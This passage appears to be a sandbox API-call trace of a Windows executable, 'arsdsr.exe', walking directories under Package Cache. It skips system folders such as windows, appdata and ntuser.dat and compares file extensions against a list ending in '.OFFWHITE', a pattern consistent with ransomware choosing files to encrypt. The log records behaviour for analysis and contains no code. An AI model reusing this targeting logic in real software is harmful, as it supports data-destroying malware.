lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.697] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.697] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfab71c60, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.697] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.697] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.697] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0151.697] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned -1 [0151.697] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\" [0151.697] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\", lpString2="packages" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages" [0151.697] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\" [0151.697] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\" [0151.697] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*" [0151.697] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0151.697] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.698] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0151.698] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.698] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.698] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="...") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="windows") returned -1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="$recycle.bin") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="rsa") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="ntuser.dat") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="programdata") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="appdata") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files") returned 1 [0151.698] lstrcmpiW (lpString1="vcRuntimeMinimum_amd64", lpString2="program files (x86)") returned 1 [0151.698] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\" [0151.698] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64" [0151.698] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" [0151.698] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" [0151.698] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*" [0151.698] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0151.698] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.698] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0151.698] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.698] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.698] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x969a2800, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x969a2800, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x969a2800, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0xc5b25, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0151.698] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="...") returned 1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="$recycle.bin") returned 1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="rsa") returned -1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="programdata") returned -1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="appdata") returned 1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="program files") returned -1 [0151.699] lstrcmpiW (lpString1="cab1.cab", lpString2="program files (x86)") returned -1 [0151.699] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" [0151.699] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0151.699] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.699] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.699] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0151.699] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0151.699] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0151.699] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0151.699] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1afc00, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x5a1afc00, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x5a1afc00, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2=".") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="..") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="...") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="windows") returned -1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$recycle.bin") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="rsa") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="ntuser.dat") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="programdata") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="appdata") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files") returned 1 [0151.699] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="program files (x86)") returned 1 [0151.699] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\" [0151.699] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", lpString2="vc_runtimeMinimum_x64.msi" | out: lpString1="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned="C:/Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" [0151.700] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0151.700] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0151.700] PathFindExtensionW (pszPath="vc_runtimeMinimum_x64.msi") returned=".msi" [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0151.700] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0151.700] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1afc00, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x5a1afc00, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x5a1afc00, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xc000be, dwReserved1=0x295dcf0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0151.700] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0151.700] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xae00ac, dwReserved1=0x295e370, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0151.700] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0151.700] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabbdf20, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabbdf20, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabbdf20, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 0 [0151.700] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0151.700] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", cAlternateFileName="{E5127~1.250")) returned 1 [0151.700] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2=".") returned 1 [0151.700] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="..") returned 1 [0151.700] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="...") returned 1 [0151.700] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="windows") returned -1 [0151.700] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="$recycle.bin") returned 1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="rsa") returned -1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="ntuser.dat") returned -1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="programdata") returned -1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="appdata") returned -1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="program files") returned -1 [0151.701] lstrcmpiW (lpString1="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="program files (x86)") returned -1 [0151.701] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Package Cache\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\") returned="C:/Users\\All Users\\Package Cache\\" [0151.701] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\", lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0151.701] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\" [0151.701] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\" [0151.701] lstrcatW (in: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" [0151.701] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0151.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0151.701] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0151.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0151.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0151.701] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e9f0, cFileName="packages", cAlternateFileName="")) returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="...") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="$recycle.bin") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="rsa") returned -1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="programdata") returned -1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="appdata") returned 1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="program files") returned -1 [0151.701] lstrcmpiW (lpString1="packages", lpString2="program files (x86)") returned 